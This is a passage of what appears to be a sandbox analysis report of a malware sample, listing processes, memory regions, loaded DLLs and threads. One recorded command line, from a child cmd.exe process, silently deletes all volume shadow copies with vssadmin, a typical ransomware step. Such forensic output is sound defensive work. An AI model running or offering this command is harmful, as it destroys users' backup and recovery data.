	        start_va = 0x7ff9575b0000
	          end_va = 0x7ff957797fff
	       monitored = 0
	     entry_point = 0x7ff9575dba70
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 4248
	        start_va = 0x7ff957e50000
	          end_va = 0x7ff958016fff
	       monitored = 0
	     entry_point = 0x7ff957eadb80
	     region_type = mapped_file
	            name = "crypt32.dll"
	        filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")

Region:
	              id = 4249
	        start_va = 0x7ff958020000
	          end_va = 0x7ff958062fff
	       monitored = 0
	     entry_point = 0x7ff958034b50
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 4250
	        start_va = 0x7ff958130000
	          end_va = 0x7ff958199fff
	       monitored = 0
	     entry_point = 0x7ff958166d50
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 4251
	        start_va = 0x7ff958250000
	          end_va = 0x7ff958266fff
	       monitored = 0
	     entry_point = 0x7ff958251390
	     region_type = mapped_file
	            name = "netapi32.dll"
	        filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")

Region:
	              id = 4252
	        start_va = 0x7ff9583d0000
	          end_va = 0x7ff9584ebfff
	       monitored = 0
	     entry_point = 0x7ff9584102b0
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 4253
	        start_va = 0x7ff9586a0000
	          end_va = 0x7ff95873cfff
	       monitored = 0
	     entry_point = 0x7ff9586a78a0
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 4254
	        start_va = 0x7ff958740000
	          end_va = 0x7ff9587aafff
	       monitored = 0
	     entry_point = 0x7ff9587590c0
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")

Region:
	              id = 4255
	        start_va = 0x7ff958860000
	          end_va = 0x7ff95890cfff
	       monitored = 0
	     entry_point = 0x7ff9588781a0
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 4256
	        start_va = 0x7ff958ba0000
	          end_va = 0x7ff958c60fff
	       monitored = 0
	     entry_point = 0x7ff958bc0da0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 4257
	        start_va = 0x7ff9590c0000
	          end_va = 0x7ff959166fff
	       monitored = 0
	     entry_point = 0x7ff9590d58d0
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 4258
	        start_va = 0x7ff959170000
	          end_va = 0x7ff959216fff
	       monitored = 0
	     entry_point = 0x7ff95917b4d0
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")

Region:
	              id = 4259
	        start_va = 0x7ff959330000
	          end_va = 0x7ff95938afff
	       monitored = 0
	     entry_point = 0x7ff9593438b0
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 4260
	        start_va = 0x7ff95a8f0000
	          end_va = 0x7ff95ab6cfff
	       monitored = 0
	     entry_point = 0x7ff95a9c4970
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 4261
	        start_va = 0x7ff95ab70000
	          end_va = 0x7ff95acf5fff
	       monitored = 0
	     entry_point = 0x7ff95abbffc0
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 4262
	        start_va = 0x7ff95ad00000
	          end_va = 0x7ff95ae55fff
	       monitored = 0
	     entry_point = 0x7ff95ad0a8d0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 4263
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")


Thread:
	id = 225
	os_tid = 0x11b8


Thread:
	id = 226
	os_tid = 0x1178


Thread:
	id = 227
	os_tid = 0x1174


Thread:
	id = 228
	os_tid = 0x1170


Thread:
	id = 229
	os_tid = 0x1144


Thread:
	id = 230
	os_tid = 0x1140


Thread:
	id = 231
	os_tid = 0x113c


Thread:
	id = 232
	os_tid = 0x1130


Thread:
	id = 233
	os_tid = 0x1114


Process:
	id = "39"
	image_name = "wmiprvse.exe"
	filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe"
	page_root = "0x73fad000"
	os_pid = "0x148"
	os_integrity_level = "0x4000"
	os_privileges = "0xe60b1e890"
	monitor_reason = "rpc_server"
	parent_id = "37"
	os_parent_pid = "0x274"
	cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	bitness = "32"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xe], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xe], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ac04" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]

Region:
	              id = 3294
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 3295
	        start_va = 0x4909200000
	          end_va = 0x49093fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000004909200000"
	        filename = ""

Region:
	              id = 3296
	        start_va = 0x4909400000
	          end_va = 0x490947ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000004909400000"
	        filename = ""

Region:
	              id = 3297
	        start_va = 0x4909500000
	          end_va = 0x490957ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000004909500000"
	        filename = ""

Region:
	              id = 3298
	        start_va = 0x4909580000
	          end_va = 0x49095fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000004909580000"
	        filename = ""

Region:
	              id = 3299
	        start_va = 0x4909600000
	          end_va = 0x490967ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000004909600000"
	        filename = ""

Region:
	              id = 3300
	        start_va = 0x4909680000
	          end_va = 0x49096fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000004909680000"
	        filename = ""

Region:
	              id = 3301
	        start_va = 0x4909700000
	          end_va = 0x490977ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000004909700000"
	        filename = ""

Region:
	              id = 3302
	        start_va = 0x4909780000
	          end_va = 0x49097fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000004909780000"
	        filename = ""

Region:
	              id = 3303
	        start_va = 0x4909800000
	          end_va = 0x490987ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000004909800000"
	        filename = ""

Region:
	              id = 3304
	        start_va = 0x1e6ecd40000
	          end_va = 0x1e6ecd4ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e6ecd40000"
	        filename = ""

Region:
	              id = 3305
	        start_va = 0x1e6ecd50000
	          end_va = 0x1e6ecd56fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e6ecd50000"
	        filename = ""

Region:
	              id = 3306
	        start_va = 0x1e6ecd60000
	          end_va = 0x1e6ecd74fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e6ecd60000"
	        filename = ""

Region:
	              id = 3307
	        start_va = 0x1e6ecd80000
	          end_va = 0x1e6ecd83fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e6ecd80000"
	        filename = ""

Region:
	              id = 3308
	        start_va = 0x1e6ecd90000
	          end_va = 0x1e6ecd90fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e6ecd90000"
	        filename = ""

Region:
	              id = 3309
	        start_va = 0x1e6ecda0000
	          end_va = 0x1e6ecda1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e6ecda0000"
	        filename = ""

Region:
	              id = 3310
	        start_va = 0x1e6ecdb0000
	          end_va = 0x1e6ece6dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 3311
	        start_va = 0x1e6ece70000
	          end_va = 0x1e6ece76fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e6ece70000"
	        filename = ""

Region:
	              id = 3312
	        start_va = 0x1e6ece80000
	          end_va = 0x1e6ecf3ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e6ece80000"
	        filename = ""

Region:
	              id = 3313
	        start_va = 0x1e6ecf40000
	          end_va = 0x1e6ecf4ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e6ecf40000"
	        filename = ""

Region:
	              id = 3314
	        start_va = 0x1e6ecf50000
	          end_va = 0x1e6ecf50fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e6ecf50000"
	        filename = ""

Region:
	              id = 3315
	        start_va = 0x1e6ecf60000
	          end_va = 0x1e6ecf60fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e6ecf60000"
	        filename = ""

Region:
	              id = 3316
	        start_va = 0x1e6ecf70000
	          end_va = 0x1e6ecf74fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "user32.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")

Region:
	              id = 3317
	        start_va = 0x1e6ecf80000
	          end_va = 0x1e6ed07ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e6ecf80000"
	        filename = ""

Region:
	              id = 3318
	        start_va = 0x1e6ed080000
	          end_va = 0x1e6ed3b6fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 3319
	        start_va = 0x1e6ed3c0000
	          end_va = 0x1e6ed547fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e6ed3c0000"
	        filename = ""

Region:
	              id = 3320
	        start_va = 0x1e6ed550000
	          end_va = 0x1e6ed6d0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e6ed550000"
	        filename = ""

Region:
	              id = 3321
	        start_va = 0x1e6ed6e0000
	          end_va = 0x1e6ed6e0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e6ed6e0000"
	        filename = ""

Region:
	              id = 3322
	        start_va = 0x1e6ed6f0000
	          end_va = 0x1e6ed7effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e6ed6f0000"
	        filename = ""

Region:
	              id = 3323
	        start_va = 0x1e6ed7f0000
	          end_va = 0x1e6ed7f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e6ed7f0000"
	        filename = ""

Region:
	              id = 3324
	        start_va = 0x1e6ed800000
	          end_va = 0x1e6ed800fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e6ed800000"
	        filename = ""

Region:
	              id = 3325
	        start_va = 0x7df5ffbf0000
	          end_va = 0x7ff5ffbeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ffbf0000"
	        filename = ""

Region:
	              id = 3326
	        start_va = 0x7ff771040000
	          end_va = 0x7ff77113ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff771040000"
	        filename = ""

Region:
	              id = 3327
	        start_va = 0x7ff771140000
	          end_va = 0x7ff771162fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff771140000"
	        filename = ""

Region:
	              id = 3328
	        start_va = 0x7ff771fc0000
	          end_va = 0x7ff77203ffff
	       monitored = 0
	     entry_point = 0x7ff771fd5f50
	     region_type = mapped_file
	            name = "wmiprvse.exe"
	        filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe")

Region:
	              id = 3329
	        start_va = 0x7ff9416f0000
	          end_va = 0x7ff94172cfff
	       monitored = 1
	     entry_point = 0x7ff9416fb760
	     region_type = mapped_file
	            name = "wmiprov.dll"
	        filename = "\\Windows\\System32\\wbem\\wmiprov.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprov.dll")

Region:
	              id = 3330
	        start_va = 0x7ff942fe0000
	          end_va = 0x7ff94302cfff
	       monitored = 0
	     entry_point = 0x7ff942feb470
	     region_type = mapped_file
	            name = "pdh.dll"
	        filename = "\\Windows\\System32\\pdh.dll" (normalized: "c:\\windows\\system32\\pdh.dll")

Region:
	              id = 3331
	        start_va = 0x7ff943030000
	          end_va = 0x7ff943054fff
	       monitored = 1
	     entry_point = 0x7ff943045dc0
	     region_type = mapped_file
	            name = "wmiperfclass.dll"
	        filename = "\\Windows\\System32\\wbem\\WmiPerfClass.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiperfclass.dll")

Region:
	              id = 3332
	        start_va = 0x7ff94a380000
	          end_va = 0x7ff94a395fff
	       monitored = 0
	     entry_point = 0x7ff94a3855e0
	     region_type = mapped_file
	            name = "ncobjapi.dll"
	        filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll")

Region:
	              id = 3333
	        start_va = 0x7ff94a570000
	          end_va = 0x7ff94a594fff
	       monitored = 0
	     entry_point = 0x7ff94a579900
	     region_type = mapped_file
	            name = "wmiutils.dll"
	        filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")

Region:
	              id = 3334
	        start_va = 0x7ff94a5a0000
	          end_va = 0x7ff94a5b3fff
	       monitored = 0
	     entry_point = 0x7ff94a5a1800
	     region_type = mapped_file
	            name = "wbemsvc.dll"
	        filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")

Region:
	              id = 3335
	        start_va = 0x7ff94a5c0000
	          end_va = 0x7ff94a6b5fff
	       monitored = 0
	     entry_point = 0x7ff94a5f9590
	     region_type = mapped_file
	            name = "fastprox.dll"
	        filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")

Region:
	              id = 3336
	        start_va = 0x7ff94ca80000
	          end_va = 0x7ff94ca90fff
	       monitored = 0
	     entry_point = 0x7ff94ca82fc0
	     region_type = mapped_file
	            name = "wbemprox.dll"
	        filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")

Region:
	              id = 3337
	        start_va = 0x7ff94e2f0000
	          end_va = 0x7ff94e36efff
	       monitored = 1
	     entry_point = 0x7ff94e307110
	     region_type = mapped_file
	            name = "wbemcomn.dll"
	        filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")

Region:
	              id = 3338
	        start_va = 0x7ff953770000
	          end_va = 0x7ff9537d3fff
	       monitored = 0
	     entry_point = 0x7ff953785ae0
	     region_type = mapped_file
	            name = "wevtapi.dll"
	        filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")

Region:
	              id = 3339
	        start_va = 0x7ff953ae0000
	          end_va = 0x7ff953af0fff
	       monitored = 0
	     entry_point = 0x7ff953ae3320
	     region_type = mapped_file
	            name = "wmiclnt.dll"
	        filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll")

Region:
	              id = 3340
	        start_va = 0x7ff956980000
	          end_va = 0x7ff9569b0fff
	       monitored = 0
	     entry_point = 0x7ff956987d10
	     region_type = mapped_file
	            name = "ntmarta.dll"
	        filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")

Region:
	              id = 3341
	        start_va = 0x7ff957320000
	          end_va = 0x7ff957348fff
	       monitored = 0
	     entry_point = 0x7ff957334530
	     region_type = mapped_file
	            name = "bcrypt.dll"
	        filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")

Region:
	              id = 3342
	        start_va = 0x7ff9574b0000
	          end_va = 0x7ff9574befff
	       monitored = 0
	     entry_point = 0x7ff9574b3210
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 3343
	        start_va = 0x7ff9575b0000
	          end_va = 0x7ff957797fff
	       monitored = 0
	     entry_point = 0x7ff9575dba70
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 3344
	        start_va = 0x7ff958130000
	          end_va = 0x7ff958199fff
	       monitored = 0
	     entry_point = 0x7ff958166d50
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 3345
	        start_va = 0x7ff9583d0000
	          end_va = 0x7ff9584ebfff
	       monitored = 0
	     entry_point = 0x7ff9584102b0
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 3346
	        start_va = 0x7ff9586a0000
	          end_va = 0x7ff95873cfff
	       monitored = 0
	     entry_point = 0x7ff9586a78a0
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 3347
	        start_va = 0x7ff958740000
	          end_va = 0x7ff9587aafff
	       monitored = 0
	     entry_point = 0x7ff9587590c0
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")

Region:
	              id = 3348
	        start_va = 0x7ff958860000
	          end_va = 0x7ff95890cfff
	       monitored = 0
	     entry_point = 0x7ff9588781a0
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 3349
	        start_va = 0x7ff958ba0000
	          end_va = 0x7ff958c60fff
	       monitored = 0
	     entry_point = 0x7ff958bc0da0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 3350
	        start_va = 0x7ff9590c0000
	          end_va = 0x7ff959166fff
	       monitored = 0
	     entry_point = 0x7ff9590d58d0
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 3351
	        start_va = 0x7ff959170000
	          end_va = 0x7ff959216fff
	       monitored = 0
	     entry_point = 0x7ff95917b4d0
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")

Region:
	              id = 3352
	        start_va = 0x7ff959330000
	          end_va = 0x7ff95938afff
	       monitored = 0
	     entry_point = 0x7ff9593438b0
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 3353
	        start_va = 0x7ff95a8f0000
	          end_va = 0x7ff95ab6cfff
	       monitored = 0
	     entry_point = 0x7ff95a9c4970
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 3354
	        start_va = 0x7ff95ab70000
	          end_va = 0x7ff95acf5fff
	       monitored = 0
	     entry_point = 0x7ff95abbffc0
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 3355
	        start_va = 0x7ff95ad00000
	          end_va = 0x7ff95ae55fff
	       monitored = 0
	     entry_point = 0x7ff95ad0a8d0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 3356
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")


Thread:
	id = 234
	os_tid = 0x10d8


Thread:
	id = 235
	os_tid = 0x10d4


Thread:
	id = 236
	os_tid = 0x10c0

	[0294.180] DllCanUnloadNow () returned 0x1
	[0294.180] DllCanUnloadNow () returned 0x1

Thread:
	id = 237
	os_tid = 0x1080


Thread:
	id = 238
	os_tid = 0x107c


Thread:
	id = 239
	os_tid = 0x1078


Thread:
	id = 240
	os_tid = 0x106c


Thread:
	id = 241
	os_tid = 0x380


Process:
	id = "40"
	image_name = "cmd.exe"
	filename = "c:\\windows\\syswow64\\cmd.exe"
	page_root = "0x2edb0000"
	os_pid = "0xc38"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x117c"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin Delete Shadows /For=P: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 3071
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 3072
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 3073
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 3074
	        start_va = 0x90000
	          end_va = 0x18ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 3075
	        start_va = 0x190000
	          end_va = 0x193fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000190000"
	        filename = ""

Region:
	              id = 3076
	        start_va = 0x1a0000
	          end_va = 0x1a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 3077
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 3078
	        start_va = 0x2f0000
	          end_va = 0x341fff
	       monitored = 1
	     entry_point = 0x304fd0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")

Region:
	              id = 3079
	        start_va = 0x350000
	          end_va = 0x434ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000350000"
	        filename = ""

Region:
	              id = 3080
	        start_va = 0x4350000
	          end_va = 0x4351fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 3081
	        start_va = 0x4400000
	          end_va = 0x45fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004400000"
	        filename = ""

Region:
	              id = 3082
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 3083
	        start_va = 0x7e6d0000
	          end_va = 0x7e6f2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007e6d0000"
	        filename = ""

Region:
	              id = 3084
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 3085
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 3086
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 3087
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 3088
	        start_va = 0x7ff95b031000
